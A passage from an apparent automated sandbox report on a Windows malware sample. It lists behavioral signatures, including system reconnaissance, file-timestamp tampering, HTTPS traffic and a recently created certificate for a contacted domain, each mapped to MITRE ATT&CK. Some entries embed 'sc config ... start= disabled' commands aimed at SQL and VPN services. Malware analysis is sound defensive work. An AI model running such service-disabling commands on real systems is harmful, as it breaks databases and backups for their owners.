terminators\"- [targetUID: N/A]\n \"5615.txt\" has type \"ASCII text with very long lines (457) with CRLF line terminators\"- [targetUID: N/A]\n \"26139.txt\" has type \"ASCII text with very long lines (457) with CRLF line terminators\"- [targetUID: N/A]\n \"10671.txt\" has type \"ASCII text with very long lines (457) with CRLF line terminators\"- [targetUID: N/A]\n \"8754.txt\" has type \"ASCII text with very long lines (455) with CRLF line terminators\"- [targetUID: N/A]\n \"15481.txt\" has type \"ASCII text with very long lines (454) with CRLF line terminators\"- [targetUID: N/A]\n \"3499.txt\" has type \"ASCII text with very long lines (453) with CRLF line terminators\"- [targetUID: N/A]\n \"7588.txt\" has type \"ASCII text with very long lines (452) with CRLF line terminators\"- [targetUID: N/A]\n \"services\" has type \"ASCII text with no line terminators\"- Location: [%WINDIR%\\System32\\drivers\\etc\\services]- [targetUID: 00000000-00005808]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-205", "type": 6, "relevance": 2, "name": "Calls an API typically used to set the date and time of the file", "description": "\"cmd.exe\" called \"SetFileTime\" (UID: 00000000-00005288)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" queries volume information of \"C:\\9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" at 00000000-00005808-0000010C-1980163", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000a701000000000000c3a9f5770000c47534eb230001000000e000c47501000000e8e92300935cd2774083d977d4a0d177e7a9f57734eb2300010000000100000070eb370000000000b8e92300e8e9230054ea230095e1cd77f7440700feffffffd4a0d1771bbec4750000557600000000 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300186d37001100001172cf0000d0f9380080b83700b1080000aaa8640000200000b0080000580f00000d004200a2000000b1080000a1000000a1080000c9570000000000000000000036a8ffff5c00500000000000b1080000 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000f5f6d177cba6f577f42e3c7270fb3700a0353c729ba6f577ece6230070ea3700b2f4d177aba6f577fce6230000003572000035720000000058e62300f0000000f00035720000000068e6230053000000fce723000000000001000000cce6230040f5d1770000000000000000b8e62300 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007f02000000000000008c47657498853e008c4765740000000098853e0014de2300086dd1771881d97700000000c8de230000000000de54d96454de230095e1cd77cf510700feffffff6b2cd2773119c57502100000000000000000010028de2300c89fd1778c4765740000000000000000 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000040000000100000031000700f801000080000000020000000000000000000000086d3500f8070000200000000000000000000000604b3700f8693500186b3500d8363800c06e350000000000f8e723000000000054ea230095e1cd771f5c0700feffffffff2bd1779a2ad17764c55a76b69fd177000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000000000000064c55a76d836380064c55a7600000000 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000035000000000074013500000000000600000000000000500135001a000000d0f93800000000001a000000000000001400000000000000000000000000000000000000000000000400000480b83700630400670000000000000000000000008000000000000000c32c00efb8d238000100000000000000020000000c000000f09c3800f09c3800eb9c380000000000000000000000350000000001c8f0230000000000e8f6230095e1cd7727520700feffffff435cd1775059d17794000000a0000000ea9c3800e89c3800940000006cf22300fdfee7770000000018000000427b3319 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000f4e4230000000000060000000000357220e523000200004024e7230024e723001a12d377000000000ce523000000000070fb37000203d377000200008801d3770000000068e72300a401d3770000000000000000000000015500530045005200330032002e0064006c006c0000000000000000000000cc770000cc7700000000d2e52300d000cc77f4e42300d0e523001ce6230095e1cd77e7480700fefffffff5f6d17716f8d177e81e3500d2e52300c8e52300c8e52300010000002ce623009ef8d177626fd17764f8d17723a6f577741235728ce62300000000000000cc77 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001800000082573319 (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"IsWow64Process\" with parameter \"5808\" - (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY$ECWDB2 START= DISABLED.EXE\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY$ECWDB2 START= DISABLED.EXE\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY START= DISABLED.EXE\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC CONFIG SQLTELEMETRY START= DISABLED.EXE\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SQLWRITER START= DISABLED.EXE\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SQLWRITER START= DISABLED.EXE\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SSTPSVC START= DISABLED.EXE\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\ SC CONFIG SSTPSVC START= DISABLED.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\* (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindNextFileW\" with parameter 36eaccfde177c2e7b93b8dbdde4e012a (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Nominatus_T7fc20cc6#\\* (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\* (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindNextFileW\" with parameter c9a4cbc00f690a9e3cddfc400f6e85bb (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\* (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindNextFileW\" with parameter 0b2f69b43a576b9edcc807a30872bd91 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindNextFileW\" with parameter 2c3c912ea8f058f9d04c4650128feb3f (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\* (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindNextFileW\" with parameter f7568d7f1b9d356f64779b4c0927cfb3 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\* (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindNextFileW\" with parameter 96f7edb07b12303f0ec2595c7f3778c7 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\* (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindNextFileW\" with parameter 31fae3290fad30c31c98651462d22724 (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\* (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindNextFileW\" with parameter 15af16d373cf0528cb74fc73d365fdbf (UID: 00000000-00005808)\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"FindFirstFileW\" with parameter %COMMONPROGRAMFILES%\\*.exe (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"117508168\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"134285390\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "registry-106", "type": 3, "relevance": 3, "name": "Read system defined device setup information from registry", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CLASS\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0002\"; Key: \"PRUNINGMODE\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-54", "type": 7, "relevance": 1, "name": "Making HTTPS connections using secure TLS/SSL version", "description": "Connection was made using TLSv1.2 [tls.handshake.version: 0x0303]", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-3", "type": 17, "relevance": 5, "name": "Short-term SSL certificate detected", "description": "Short term registered certificate: \"vgmsite.com\" (89 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "certificate-4", "type": 17, "relevance": 5, "name": "Recently renewed or created SSL certificate", "description": "Newly renewed or created SSL certificate: \"vgmsite.com\" (0 days old)", "origin": "Certificate Data", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00005808)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n 